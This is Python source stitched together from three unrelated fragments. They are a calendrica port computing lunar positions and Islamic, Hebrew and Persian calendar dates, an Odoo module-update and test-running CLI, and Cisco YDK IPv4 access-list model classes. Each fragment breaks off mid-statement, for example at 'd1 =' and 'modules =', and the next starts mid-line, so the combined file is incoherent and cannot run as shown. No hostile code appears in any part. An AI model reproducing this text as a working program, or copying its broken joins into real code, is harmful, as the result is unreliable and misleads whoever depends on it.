0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, -2, 2, 0, 2, 0, 0, 0, 0, 0, 0, -2, 0, 0, 0, 0, -2, -2, 0, 0, 0, 0, 0, 0, 0, -2] cosine_coefficients = \ [-20905355, -3699111, -2955968, -569925, 48888, -3149, 246158, -152138, -170733, -204586, -129620, 108743, 104755, 10321, 0, 79661, -34782, -23210, -21636, 24208, 30824, -8379, -16675, -12831, -10445, -11650, 14403, -7003, 0, 10056, 6322, -9884, 5751, 0, -4950, 4130, 0, -3958, 0, 3258, 2616, -1897, -2117, 2354, 0, 0, -1423, -1117, -1571, -1739, 0, -4421, 0, 0, 0, 0, 1165, 0, 0, 8752] correction = sigma ([cosine_coefficients, args_lunar_elongation, args_solar_anomaly, args_lunar_anomaly, args_moon_node], lambda v, w, x, y, z: (v * pow(cap_E, abs(x)) * cosine_degrees((w * cap_D) + (x * cap_M) + (y * cap_M_prime) + (z * cap_F)))) return mt(385000560) + correction def lunar_position(tee): """Return the moon position (geocentric latitude and longitude [in degrees] and distance [in meters]) at moment, tee. Adapted from "Astronomical Algorithms" by <NAME>, Willmann_Bell, Inc., 2nd ed.""" return (lunar_latitude(tee), lunar_longitude(tee), lunar_distance(tee)) # see lines 3815-3824 in calendrica-3.0.cl def lunar_parallax(tee, location): """Return the parallax of moon at moment, tee, at location, location. Adapted from "Astronomical Algorithms" by <NAME>, Willmann_Bell, Inc., 1998.""" geo = lunar_altitude(tee, location) Delta = lunar_distance(tee) alt = mt(6378140) / Delta arg = alt * cosine_degrees(geo) return arcsin_degrees(arg) # see lines 3826-3832 in calendrica-3.0.cl def topocentric_lunar_altitude(tee, location): """Return the topocentric altitude of moon at moment, tee, at location, location, as a small positive/negative angle in degrees, ignoring refraction.""" return lunar_altitude(tee, location) - lunar_parallax(tee, location) # see lines 3834-3839 in calendrica-3.0.cl def lunar_diameter(tee): """Return the geocentric apparent lunar diameter of the moon (in degrees) at moment, tee. Adapted from 'Astronomical Algorithms' by <NAME>, Willmann_Bell, Inc., 2nd ed.""" return deg(1792367000/9) / lunar_distance(tee) ########################################### # astronomical lunar calendars algorithms # ########################################### # see lines 5829-5845 in calendrica-3.0.cl def visible_crescent(date, location): """Return <NAME> criterion for likely visibility of crescent moon on eve of date 'date', at location 'location'.""" tee = universal_from_standard(dusk(date - 1, location, deg(mpf(4.5))), location) phase = lunar_phase(tee) altitude = lunar_altitude(tee, location) arc_of_light = arccos_degrees(cosine_degrees(lunar_latitude(tee)) * cosine_degrees(phase)) return ((NEW < phase < FIRST_QUARTER) and (deg(mpf(10.6)) <= arc_of_light <= deg(90)) and (altitude > deg(mpf(4.1)))) # see lines 5847-5860 in calendrica-3.0.cl def phasis_on_or_before(date, location): """Return the closest fixed date on or before date 'date', when crescent moon first became visible at location 'location'.""" mean = date - ifloor(lunar_phase(date + 1) / deg(360) * MEAN_SYNODIC_MONTH) tau = ((mean - 30) if (((date - mean) <= 3) and (not visible_crescent(date, location))) else (mean - 2)) return next(tau, lambda d: visible_crescent(d, location)) # see lines 5862-5866 in calendrica-3.0.cl # see lines 220-221 in calendrica-3.0.errata.cl # Sample location for Observational Islamic calendar # (Cairo, Egypt). 
ISLAMIC_LOCATION = location(deg(mpf(30.1)), deg(mpf(31.3)), mt(200), hr(2)) # see lines 5868-5882 in calendrica-3.0.cl def fixed_from_observational_islamic(i_date): """Return fixed date equivalent to Observational Islamic date, i_date.""" month = standard_month(i_date) day = standard_day(i_date) year = standard_year(i_date) midmonth = ISLAMIC_EPOCH + ifloor((((year - 1) * 12) + month - 0.5) * MEAN_SYNODIC_MONTH) return (phasis_on_or_before(midmonth, ISLAMIC_LOCATION) + day - 1) # see lines 5884-5896 in calendrica-3.0.cl def observational_islamic_from_fixed(date): """Return Observational Islamic date (year month day) corresponding to fixed date, date.""" crescent = phasis_on_or_before(date, ISLAMIC_LOCATION) elapsed_months = iround((crescent - ISLAMIC_EPOCH) / MEAN_SYNODIC_MONTH) year = quotient(elapsed_months, 12) + 1 month = mod(elapsed_months, 12) + 1 day = (date - crescent) + 1 return islamic_date(year, month, day) # see lines 5898-5901 in calendrica-3.0.cl JERUSALEM = location(deg(mpf(31.8)), deg(mpf(35.2)), mt(800), hr(2)) # see lines 5903-5918 in calendrica-3.0.cl def astronomical_easter(g_year): """Return date of (proposed) astronomical Easter in Gregorian year, g_year.""" jan1 = gregorian_new_year(g_year) equinox = solar_longitude_after(SPRING, jan1) paschal_moon = ifloor(apparent_from_local( local_from_universal( lunar_phase_at_or_after(FULL, equinox), JERUSALEM), JERUSALEM)) # Return the Sunday following the Paschal moon. return kday_after(SUNDAY, paschal_moon) # see lines 5920-5923 in calendrica-3.0.cl JAFFA = location(angle(32, 1, 60), angle(34, 45, 0), mt(0), hr(2)) # see lines 5925-5938 in calendrica-3.0.cl def phasis_on_or_after(date, location): """Return closest fixed date on or after date, date, on the eve of which crescent moon first became visible at location, location.""" mean = date - ifloor(lunar_phase(date + 1) / deg(mpf(360)) * MEAN_SYNODIC_MONTH) tau = (date if (((date - mean) <= 3) and (not visible_crescent(date - 1, location))) else (mean + 29)) return next(tau, lambda d: visible_crescent(d, location)) # see lines 5940-5955 in calendrica-3.0.cl def observational_hebrew_new_year(g_year): """Return fixed date of Observational (classical) Nisan 1 occurring in Gregorian year, g_year.""" jan1 = gregorian_new_year(g_year) equinox = solar_longitude_after(SPRING, jan1) sset = universal_from_standard(sunset(ifloor(equinox), JAFFA), JAFFA) return phasis_on_or_after(ifloor(equinox) - (14 if (equinox < sset) else 13), JAFFA) # see lines 5957-5973 in calendrica-3.0.cl def fixed_from_observational_hebrew(h_date): """Return fixed date equivalent to Observational Hebrew date.""" month = standard_month(h_date) day = standard_day(h_date) year = standard_year(h_date) year1 = (year - 1) if (month >= TISHRI) else year start = fixed_from_hebrew(hebrew_date(year1, NISAN, 1)) g_year = gregorian_year_from_fixed(start + 60) new_year = observational_hebrew_new_year(g_year) midmonth = new_year + iround(29.5 * (month - 1)) + 15 return phasis_on_or_before(midmonth, JAFFA) + day - 1 # see lines 5975-5991 in calendrica-3.0.cl def observational_hebrew_from_fixed(date): """Return Observational Hebrew date (year month day) corresponding to fixed date, date.""" crescent = phasis_on_or_before(date, JAFFA) g_year = gregorian_year_from_fixed(date) ny = observational_hebrew_new_year(g_year) new_year = observational_hebrew_new_year(g_year - 1) if (date < ny) else ny month = iround((crescent - new_year) / 29.5) + 1 year = (standard_year(hebrew_from_fixed(new_year)) + (1 if (month >= TISHRI) else 0)) day 
= date - crescent + 1 return hebrew_date(year, month, day) # see lines 5993-5997 in calendrica-3.0.cl def classical_passover_eve(g_year): """Return fixed date of Classical (observational) Passover Eve (Nisan 14) occurring in Gregorian year, g_year.""" return observational_hebrew_new_year(g_year) + 13 ############################### # persian calendar algorithms # ############################### # see lines 3844-3847 in calendrica-3.0.cl def persian_date(year, month, day): """Return a Persian date data structure.""" return [year, month, day] # see lines 3849-3852 in calendrica-3.0.cl PERSIAN_EPOCH = fixed_from_julian(julian_date(ce(622), MARCH, 19)) # see lines 3854-3858 in calendrica-3.0.cl TEHRAN = location(deg(mpf(35.68)), deg(mpf(51.42)), mt(1100), hr(3 + 1/2)) # see lines 3860-3865 in calendrica-3.0.cl def midday_in_tehran(date): """Return Universal time of midday on fixed date, date, in Tehran.""" return universal_from_standard(midday(date, TEHRAN), TEHRAN) # see lines 3867-3876 in calendrica-3.0.cl def persian_new_year_on_or_before(date): """Return the fixed date of Astronomical Persian New Year on or before fixed date, date.""" approx = estimate_prior_solar_longitude(SPRING, midday_in_tehran(date)) return next(ifloor(approx) - 1, lambda day: (solar_longitude(midday_in_tehran(day)) <= (SPRING + deg(2)))) # see lines 3880-3898 in calendrica-3.0.cl def fixed_from_persian(p_date): """Return fixed date of Astronomical Persian date, p_date.""" month = standard_month(p_date) day = standard_day(p_date) year = standard_year(p_date) temp = (year - 1) if (0 < year) else year new_year = persian_new_year_on_or_before(PERSIAN_EPOCH + 180 + ifloor(MEAN_TROPICAL_YEAR * temp)) return ((new_year - 1) + ((31 * (month - 1)) if (month <= 7) else (30 * (month - 1) + 6)) + day) # see lines 3898-3918 in calendrica-3.0.cl def persian_from_fixed(date): """Return Astronomical Persian date (year month day) corresponding to fixed date, date.""" new_year = persian_new_year_on_or_before(date) y = iround((new_year - PERSIAN_EPOCH) / MEAN_TROPICAL_YEAR) + 1 year = y if (0 < y) else (y - 1) day_of_year = date - fixed_from_persian(persian_date(year, 1, 1)) + 1 month = (ceiling(day_of_year / 31) if (day_of_year <= 186) else ceiling((day_of_year - 6) / 30)) day = date - (fixed_from_persian(persian_date(year, month, 1)) - 1) return persian_date(year, month, day) # see lines 3920-3932 in calendrica-3.0.cl def is_arithmetic_persian_leap_year(p_year): """Return True if p_year is a leap year on the Persian calendar.""" y = (p_year - 474) if (0 < p_year) else (p_year - 473) year = mod(y, 2820) + 474 return mod((year + 38) * 31, 128) < 31 # see lines 3934-3958 in calendrica-3.0.cl def fixed_from_arithmetic_persian(p_date): """Return fixed date equivalent to Persian date p_date.""" day = standard_day(p_date) month = standard_month(p_date) p_year = standard_year(p_date) y = (p_year - 474) if (0 < p_year) else (p_year - 473) year = mod(y, 2820) + 474 temp = (31 * (month - 1)) if (month <= 7) else ((30 * (month - 1)) + 6) return ((PERSIAN_EPOCH - 1) + (1029983 * quotient(y, 2820)) + (365 * (year - 1)) + quotient((31 * year) - 5, 128) + temp + day) # see lines 3960-3986 in calendrica-3.0.cl def arithmetic_persian_year_from_fixed(date): """Return Persian year corresponding to the fixed date, date.""" d0 = date - fixed_from_arithmetic_persian(persian_date(475, 1, 1)) n2820 = quotient(d0, 1029983) d1 =
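# --- Added standalone sketch (plain-Python restatement of the leap-year rule above) ---
# is_arithmetic_persian_leap_year() uses only integer arithmetic, so the rule can
# be exercised without the rest of the calendrica helpers:
def arithmetic_persian_leap(p_year):
    y = (p_year - 474) if p_year > 0 else (p_year - 473)
    year = y % 2820 + 474
    return ((year + 38) * 31) % 128 < 31

print(arithmetic_persian_leap(1399))   # the arithmetic rule classifies 1399 A.P. as a leap year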
params += ['--no-install-server-wide-first'] if no_update_module_list: params += ['--no-update-modulelist'] if no_dangling_check: params += ['--no-dangling-check'] if i18n: params += ['--i18n'] if not tests: params += ['--no-tests'] if server_wide_modules: params += ['--server-wide-modules', server_wide_modules] if additional_addons_paths: params += ['--additional-addons-paths', additional_addons_paths] params += ["--config-file=" + config_file] rc = _exec_update(config, params) if rc: raise UpdateException(module) except UpdateException: raise except Exception as ex: click.echo(traceback.format_exc()) ctx.invoke(show_install_state, suppress_error=no_dangling_check) raise Exception(( "Error at /update_modules.py - " "aborting update process.")) from ex if check_install_state: ctx.invoke(show_install_state, suppress_error=no_dangling_check) if outdated_modules: _technically_update(outdated_modules) _technically_update(module) if not no_restart and config.use_docker: Commands.invoke(ctx, 'restart', machines=['odoo']) if config.run_odoocronjobs: Commands.invoke(ctx, 'restart', machines=['odoo_cronjobs']) if config.run_queuejobs: Commands.invoke(ctx, 'restart', machines=['odoo_queuejobs']) Commands.invoke(ctx, 'up', daemon=True) Commands.invoke(ctx, 'status') if config.odoo_update_start_notification_touch_file_in_container: Path( config.odoo_update_start_notification_touch_file_in_container).write_text("0") def _uninstall_marked_modules(): """ Checks for file "uninstall" in customs root and sets modules to uninstalled. """ from .odoo_config import MANIFEST if float(config.odoo_version) < 11.0: return # check if something is todo to_uninstall = MANIFEST().get('uninstall', []) to_uninstall = [x for x in to_uninstall if DBModules.is_module_installed(x)] if to_uninstall: click.secho("Going to uninstall {}".format(', '.join(to_uninstall)), fg='red') if config.use_docker: from .lib_control_with_docker import shell as lib_shell for module in to_uninstall: click.secho(f"Uninstall {module}", fg='red') lib_shell(""" self.env['ir.module.module'].search([ ('name', '=', '{}'), ('state', 'in', ['to upgrade', 'to install', 'installed']) ]).module_uninstall() self.env.cr.commit() """.format(module)) to_uninstall = [x for x in to_uninstall if DBModules.is_module_installed(x)] if to_uninstall: click.secho(f"Failed to uninstall: {','.join(to_uninstall)}", fg='red') sys.exit(-1) if not uninstall: _perform_install(module) _uninstall_marked_modules() if param_module not in ['all', 'base']: missing_modules = list( DBModules.check_if_all_modules_from_install_are_installed()) if missing_modules and not no_dangling_check: click.secho(( f"Not installed: {','.join(missing_modules)}" ), fg='red') sys.exit(-88) @odoo_module.command(name="update-i18n", help="Just update translations") @click.argument('module', nargs=-1, required=False) @click.option('--no-restart', default=False, is_flag=True, help="If set, no machines are restarted afterwards") @pass_config @click.pass_context def update_i18n(ctx, config, module, no_restart): if config.run_postgres: Commands.invoke(ctx, 'up', machines=['postgres'], daemon=True) Commands.invoke(ctx, 'wait_for_container_postgres') module = list(filter(lambda x: x, sum(map(lambda x: x.split(','), module), []))) # '1,2 3' --> ['1', '2', '3'] if not module: module = _get_default_modules_to_update() try: params = [','.join(module)] params += ['--non-interactive'] params += ['--no-update-modulelist'] params += ['--no-dangling-check'] params += ['--only-i18n'] _exec_update(config, params) except 
Exception: click.echo(traceback.format_exc()) ctx.invoke(show_install_state, suppress_error=True) raise Exception("Error at /update_modules.py - aborting update process.") if not no_restart: Commands.invoke(ctx, 'restart', machines=['odoo']) @odoo_module.command() @pass_config def progress(config): """ Displays installation progress """ for row in _execute_sql(config.get_odoo_conn(), "select state, count(*) from ir_module_module group by state;", fetchall=True): click.echo("{}: {}".format(row[0], row[1])) @odoo_module.command(name='show-install-state') @pass_config def show_install_state(config, suppress_error=False): from .module_tools import DBModules dangling = list(DBModules.get_dangling_modules()) if dangling: click.echo("Displaying dangling modules:") for row in dangling: click.echo("{}: {}".format(row[0], row[1])) # get modules, that are not installed: missing = list(DBModules.check_if_all_modules_from_install_are_installed()) for missing_item in missing: click.secho(( f"Module {missing_item} not installed!" ), fg='red') if (dangling or missing) and not suppress_error: raise Exception(( "Dangling modules detected - " " please fix installation problems and retry! \n" f"Dangling: {dangling}\n" f"Missing: {missing}\n" )) @odoo_module.command(name='show-addons-paths') def show_addons_paths(): from .odoo_config import get_odoo_addons_paths paths = get_odoo_addons_paths() for path in paths: click.echo(path) @odoo_module.command(name='pretty-print-manifest') def pretty_print_manifest(): from .odoo_config import MANIFEST MANIFEST().rewrite() @odoo_module.command(name='show-conflicting-modules') def show_conflicting_modules(): from .odoo_config import get_odoo_addons_paths get_odoo_addons_paths() def _exec_update(config, params): if config.use_docker: params = ['run', 'odoo_update', '/update_modules.py'] + params return __cmd_interactive(*params) else: from . import lib_control_native return lib_control_native._update_command(config, params) @odoo_module.command() @click.argument('file', required=False) @click.option('-u', '--user', default='admin') @click.option('-a', '--all', is_flag=True) @click.option('-t', '--tag', is_flag=False) @click.option('-n', '--test_name', is_flag=False) @click.option('-p', '--param', multiple=True, help="e.g. --param key1=value1 --param key2=value2") @click.option('--install-required-modules', is_flag=True, help="No tests run - just the dependencies are installed like e.g. web_selenium") @pass_config @click.pass_context def robotest(ctx, config, file, user, all, tag, test_name, param, install_required_modules): PARAM = param del param from pathlib import Path from .odoo_config import customs_dir from .robo_helpers import _make_archive from .module_tools import DBModules if not config.devmode and not config.force: click.secho("Devmode required to run robot tests. Database will be destroyed.", fg='red') sys.exit(-1) testfiles = _get_all_robottest_files() if file and all: click.secho("Cannot provide all and file together!", fg='red') sys.exit(-1) if file: if '/' in file: filename = Path(file) else: match = [x for x in testfiles if file in x.name] if len(match) > 1: click.secho(f"Not unique: {file}", fg='red') sys.exit(-1) if match: filename = match[0] if filename not in testfiles: click.secho(f"Not found: {filename}", fg='red') sys.exit(-1) filename = [filename] else: testfiles = sorted(testfiles) if not all: message = "Please choose the robot test to run."
try: filename = [inquirer.prompt([inquirer.List('filename', message, choices=testfiles)]).get('filename')] except Exception: sys.exit(-1) else: filename = list(sorted(testfiles)) if not filename: return click.secho('\n'.join(map(str, filename)), fg='green', bold=True) odoo_modules, archive = _make_archive(config.verbose, filename, customs_dir()) odoo_modules = list(set(odoo_modules) | set(['web_selenium', 'robot_utils'])) if odoo_modules: def not_installed(module): return DBModules.get_meta_data(module)['state'] == 'uninstalled' modules_to_install = list(filter(not_installed, odoo_modules)) if modules_to_install: click.secho(( "Installing required modules for robot tests: " f"{','.join(modules_to_install)}" ), fg='yellow') Commands.invoke( ctx, 'update', module=modules_to_install, no_dangling_check=True) if install_required_modules: click.secho("Dependencies are installed - exiting", fg='yellow') return pwd = config.DEFAULT_DEV_PASSWORD if pwd == "True" or pwd is True: pwd = '1' def params(): params = { "url": "http://proxy", "user": user, "dbname": config.DBNAME, "password": config.DEFAULT_DEV_PASSWORD, "selenium_timeout": 20, # selenium timeout, } if test_name: params['test_name'] = test_name if tag: params['include'] = [tag] for param in PARAM: k, v = param.split("=") params[k] = v del param return params data = json.dumps({ 'test_file': archive, 'params': params(), }) data = base64.b64encode(data.encode('utf-8')) params = [ 'robot', ] __dcrun(params, pass_stdin=data.decode('utf-8'), interactive=True) output_path = config.HOST_RUN_DIR / 'odoo_outdir' / 'robot_output' test_results = json.loads((output_path / 'results.json').read_text()) failds = [x for x in test_results if x['result'] != 'ok'] color_info = 'green' for failed in failds: color_info = 'red' click.secho(f"Test failed: {failed['name']} - Duration: {failed['duration']}", fg='red') click.secho(f"Duration: {sum(map(lambda x: x['duration'], test_results))}s", fg=color_info) click.secho(f"Outputs are generated in {output_path}", fg='yellow') click.secho(f"Watch the logs online at: http://host:{config.PROXY_PORT}/robot-output") if failds: sys.exit(-1) def _get_unittests_from_module(module_name): from .module_tools import Module from .odoo_config import MANIFEST_FILE testfiles = [] module = Module.get_by_name(module_name) parent_dir = MANIFEST_FILE().parent for _file in module.path.glob("tests/test*.py"): testfiles.append(_file.relative_to(parent_dir)) return testfiles def _get_unittests_from_modules(module_names): testfiles = [] for module in module_names: testfiles += _get_unittests_from_module(module) return testfiles def _get_all_unittest_files(config, all_files=False): from .odoo_config import MANIFEST modules = all_files and __get_installed_modules(config) or MANIFEST().get('install', []) return _get_unittests_from_modules(modules) def _get_all_robottest_files(): from .odoo_config import MANIFEST, MANIFEST_FILE from .module_tools import Module from .odoo_config import customs_dir testfiles = [] for _file in customs_dir().glob("**/*.robot"): if 'keywords' in _file.parts: continue if 'library' in _file.parts: continue testfiles.append(_file.relative_to(MANIFEST_FILE().parent)) del _file return testfiles @odoo_module.command() @click.option('-a', '--all', is_flag=True) @pass_config def list_unit_test_files(config, all): files = _get_all_unittest_files(config, all_files=all) click.secho("!!!") for file in files: click.secho(file) click.secho("!!!") @odoo_module.command() @pass_config def list_robot_test_files(config): files = 
_get_all_robottest_files() click.secho("!!!") for file in files: click.secho(file) click.secho("!!!") @odoo_module.command() @click.option('-r', '--repeat', is_flag=True) @click.argument('file', required=False) @click.option('-w', '--wait-for-remote', is_flag=True) @click.option('-r', '--remote-debug', is_flag=True) @click.option('-a', '--all', is_flag=True) @click.option('-n', '--non-interactive', is_flag=True) @pass_config def unittest(config, repeat, file, remote_debug, wait_for_remote, all, non_interactive): """ Collects unittest files and offers to run """ from .odoo_config import MANIFEST, MANIFEST_FILE from .module_tools import Module from pathlib import Path last_unittest = config.runtime_settings.get('last_unittest') testfiles = _get_all_unittest_files(config, all_files=all) if file: if '/' in file: filename = Path(file) else: match = [x for x in testfiles if x.name == file or x.name == file + '.py'] if match: filename = match[0] if filename not in testfiles: click.secho(f"Not found: {filename}", fg='red') sys.exit(-1) else: if repeat and last_unittest: filename = last_unittest else: testfiles = sorted(testfiles) message = "Please choose the unittest to run." filename = inquirer.prompt([inquirer.List('filename', message, choices=testfiles)]).get('filename') if not filename: return config.runtime_settings.set('last_unittest', filename) click.secho(str(filename), fg='green', bold=True) container_file = Path('/opt/src/') / filename interactive = True # means pudb trace turned on params = [ 'odoo', '/odoolib/unit_test.py', f'{container_file}', ] if wait_for_remote: remote_debug = True interactive = False if non_interactive: interactive = False del non_interactive if remote_debug: params += ["--remote-debug"] if wait_for_remote: params += ["--wait-for-remote"] if not interactive: params += ['--not-interactive'] __dcrun(params + ['--log-level=debug'], interactive=interactive) @odoo_module.command() @click.argument("name", required=True) @pass_config @click.pass_context def set_ribbon(ctx, config, name): SQL = """ Select state from ir_module_module where name = 'web_environment_ribbon'; """ res = _execute_sql(config.get_odoo_conn(), SQL, fetchone=True) if not (res and res[0] == 'installed'): try: Commands.invoke( ctx, 'update', module=['web_environment_ribbon'], no_dangling_check=True) except Exception as ex: print(ex) _execute_sql(config.get_odoo_conn(), """ UPDATE ir_config_parameter SET value = %s WHERE key = 'ribbon.name'; """, params=(name,)) @odoo_module.command(help="For directly installed odoos.") @pass_config @click.pass_context def generate_update_command(ctx, config): modules = _get_default_modules_to_update() click.secho(f"-u {','.join(modules)}") def _get_changed_files(git_sha): from .module_tools import Module from .tools import git_diff_files cwd = os.getcwd() filepaths = git_diff_files(cwd, git_sha, "HEAD") repo = Repo(cwd) # check if there are submodules: filepaths2 = [] cwd = Path(os.getcwd()) for filepath in filepaths: os.chdir(cwd) submodule = [x for x in repo.submodules if x.path == filepath] if submodule: current_commit = str(repo.active_branch.commit) old_commit = subprocess.check_output([ 'git', 'rev-parse', f"{git_sha}:./{filepath}" ]).decode("utf-8").strip() new_commit = subprocess.check_output([ 'git', 'rev-parse', f"{current_commit}:./{filepath}" ]).decode("utf-8").strip() # now diff the submodule submodule_path = cwd / filepath submodule_relative_path = filepath for filepath2 in git_diff_files( submodule_path, old_commit, new_commit ): 
filepaths2.append(submodule_relative_path + "/" + filepath2) else: filepaths2.append(filepath) return filepaths2 def _get_changed_modules(git_sha): from .module_tools import Module filepaths = _get_changed_files(git_sha) modules =
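# The comma/space handling for the `module` CLI argument appears twice above; a small
# helper could factor it out. A sketch only (hypothetical helper, not part of the
# original file):
def _split_module_arg(module):
    """Turn ('mod1,mod2', 'mod3') into ['mod1', 'mod2', 'mod3']."""
    return [m for chunk in module for m in chunk.split(',') if m]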
<ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_datatypes.Ipv4AclPortNumberEnum>` ---- **type**\: int **range:** 0..65535 ---- .. attribute:: source_operator Source comparison operator . Leave unspecified if no source port comparison is to be done **type**\: :py:class:`Ipv4AclOperatorEnumEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_datatypes.Ipv4AclOperatorEnumEnum>` """ _prefix = 'ipv4-acl-cfg' _revision = '2015-11-09' def __init__(self): self.parent = None self.first_source_port = None self.second_source_port = None self.source_operator = None @property def _common_path(self): if self.parent is None: raise YPYModelError('parent is not set . Cannot derive path.') return self.parent._common_path +'/Cisco-IOS-XR-ipv4-acl-cfg:source-port' def is_config(self): ''' Returns True if this instance represents config data else returns False ''' return True def _has_data(self): if not self.is_config(): return False if self.first_source_port is not None: return True if self.second_source_port is not None: return True if self.source_operator is not None: return True return False @staticmethod def _meta_info(): from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_acl_cfg as meta return meta._meta_table['Ipv4AclAndPrefixList.Accesses.Access.AccessListEntries.AccessListEntry.SourcePort']['meta_info'] class DestinationPort(object): """ Destination port settings. .. attribute:: destination_operator Destination comparison operator. Leave unspecified if no destination port comparison is to be done **type**\: :py:class:`Ipv4AclOperatorEnumEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_datatypes.Ipv4AclOperatorEnumEnum>` .. attribute:: first_destination_port First destination port for comparison, leave unspecified if destination port comparison is not to be performed **type**\: one of the below types: **type**\: :py:class:`Ipv4AclPortNumberEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_datatypes.Ipv4AclPortNumberEnum>` ---- **type**\: int **range:** 0..65535 ---- .. attribute:: second_destination_port Second destination port for comparion, leave unspecified if destination port comparison is not to be performed **type**\: one of the below types: **type**\: :py:class:`Ipv4AclPortNumberEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_datatypes.Ipv4AclPortNumberEnum>` ---- **type**\: int **range:** 0..65535 ---- """ _prefix = 'ipv4-acl-cfg' _revision = '2015-11-09' def __init__(self): self.parent = None self.destination_operator = None self.first_destination_port = None self.second_destination_port = None @property def _common_path(self): if self.parent is None: raise YPYModelError('parent is not set . Cannot derive path.') return self.parent._common_path +'/Cisco-IOS-XR-ipv4-acl-cfg:destination-port' def is_config(self): ''' Returns True if this instance represents config data else returns False ''' return True def _has_data(self): if not self.is_config(): return False if self.destination_operator is not None: return True if self.first_destination_port is not None: return True if self.second_destination_port is not None: return True return False @staticmethod def _meta_info(): from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_acl_cfg as meta return meta._meta_table['Ipv4AclAndPrefixList.Accesses.Access.AccessListEntries.AccessListEntry.DestinationPort']['meta_info'] class Icmp(object): """ ICMP settings. .. 
attribute:: icmp_type_code Well known ICMP message code types to match, leave unspecified if ICMP message code type comparion is not to be performed **type**\: :py:class:`Ipv4AclIcmpTypeCodeEnumEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_datatypes.Ipv4AclIcmpTypeCodeEnumEnum>` """ _prefix = 'ipv4-acl-cfg' _revision = '2015-11-09' def __init__(self): self.parent = None self.icmp_type_code = None @property def _common_path(self): if self.parent is None: raise YPYModelError('parent is not set . Cannot derive path.') return self.parent._common_path +'/Cisco-IOS-XR-ipv4-acl-cfg:icmp' def is_config(self): ''' Returns True if this instance represents config data else returns False ''' return True def _has_data(self): if not self.is_config(): return False if self.icmp_type_code is not None: return True return False @staticmethod def _meta_info(): from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_acl_cfg as meta return meta._meta_table['Ipv4AclAndPrefixList.Accesses.Access.AccessListEntries.AccessListEntry.Icmp']['meta_info'] class Tcp(object): """ TCP settings. .. attribute:: tcp_bits TCP bits to match. Leave unspecified if comparison of TCP bits is not required **type**\: one of the below types: **type**\: :py:class:`Ipv4AclTcpBitsNumberEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_datatypes.Ipv4AclTcpBitsNumberEnum>` ---- **type**\: int **range:** 0..32 ---- .. attribute:: tcp_bits_mask TCP bits mask to use for flexible TCP matching. Leave unspecified if tcp\-bits\-match\-operator is unspecified **type**\: one of the below types: **type**\: :py:class:`Ipv4AclTcpBitsNumberEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_datatypes.Ipv4AclTcpBitsNumberEnum>` ---- **type**\: int **range:** 0..32 ---- .. attribute:: tcp_bits_match_operator TCP Bits match operator. Leave unspecified if flexible comparison of TCP bits is not required **type**\: :py:class:`Ipv4AclTcpMatchOperatorEnumEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_datatypes.Ipv4AclTcpMatchOperatorEnumEnum>` """ _prefix = 'ipv4-acl-cfg' _revision = '2015-11-09' def __init__(self): self.parent = None self.tcp_bits = None self.tcp_bits_mask = None self.tcp_bits_match_operator = None @property def _common_path(self): if self.parent is None: raise YPYModelError('parent is not set . Cannot derive path.') return self.parent._common_path +'/Cisco-IOS-XR-ipv4-acl-cfg:tcp' def is_config(self): ''' Returns True if this instance represents config data else returns False ''' return True def _has_data(self): if not self.is_config(): return False if self.tcp_bits is not None: return True if self.tcp_bits_mask is not None: return True if self.tcp_bits_match_operator is not None: return True return False @staticmethod def _meta_info(): from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_acl_cfg as meta return meta._meta_table['Ipv4AclAndPrefixList.Accesses.Access.AccessListEntries.AccessListEntry.Tcp']['meta_info'] class PacketLength(object): """ Packet length settings. .. attribute:: packet_length_max Maximum packet length for comparion, leave unspecified if packet length comparison is not to be performed or if only the minimum packet length should be considered **type**\: int **range:** 0..65535 .. attribute:: packet_length_min Minimum packet length for comparison, leave unspecified if packet length comparison is not to be performed or if only the maximum packet length should be considered **type**\: int **range:** 0..65535 .. 
attribute:: packet_length_operator Packet length operator applicable if Packet length is to be compared. Leave unspecified if no packet length comparison is to be done **type**\: :py:class:`Ipv4AclOperatorEnumEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_datatypes.Ipv4AclOperatorEnumEnum>` """ _prefix = 'ipv4-acl-cfg' _revision = '2015-11-09' def __init__(self): self.parent = None self.packet_length_max = None self.packet_length_min = None self.packet_length_operator = None @property def _common_path(self): if self.parent is None: raise YPYModelError('parent is not set . Cannot derive path.') return self.parent._common_path +'/Cisco-IOS-XR-ipv4-acl-cfg:packet-length' def is_config(self): ''' Returns True if this instance represents config data else returns False ''' return True def _has_data(self): if not self.is_config(): return False if self.packet_length_max is not None: return True if self.packet_length_min is not None: return True if self.packet_length_operator is not None: return True return False @staticmethod def _meta_info(): from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_acl_cfg as meta return meta._meta_table['Ipv4AclAndPrefixList.Accesses.Access.AccessListEntries.AccessListEntry.PacketLength']['meta_info'] class TimeToLive(object): """ TTL settings. .. attribute:: time_to_live_max Maximum TTL for comparion, leave unspecified if TTL comparison is not to be performed or if only the minimum TTL should be considered **type**\: int **range:** 0..255 .. attribute:: time_to_live_min TTL value for comparison OR Minimum TTL value for TTL range comparision, leave unspecified if TTL classification is not required **type**\: int **range:** 0..255 .. attribute:: time_to_live_operator TTL operator is applicable if TTL is to be compared. Leave unspecified if TTL classification is not required **type**\: :py:class:`Ipv4AclOperatorEnumEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_datatypes.Ipv4AclOperatorEnumEnum>` """ _prefix = 'ipv4-acl-cfg' _revision = '2015-11-09' def __init__(self): self.parent = None self.time_to_live_max = None self.time_to_live_min = None self.time_to_live_operator = None @property def _common_path(self): if self.parent is None: raise YPYModelError('parent is not set . Cannot derive path.') return self.parent._common_path 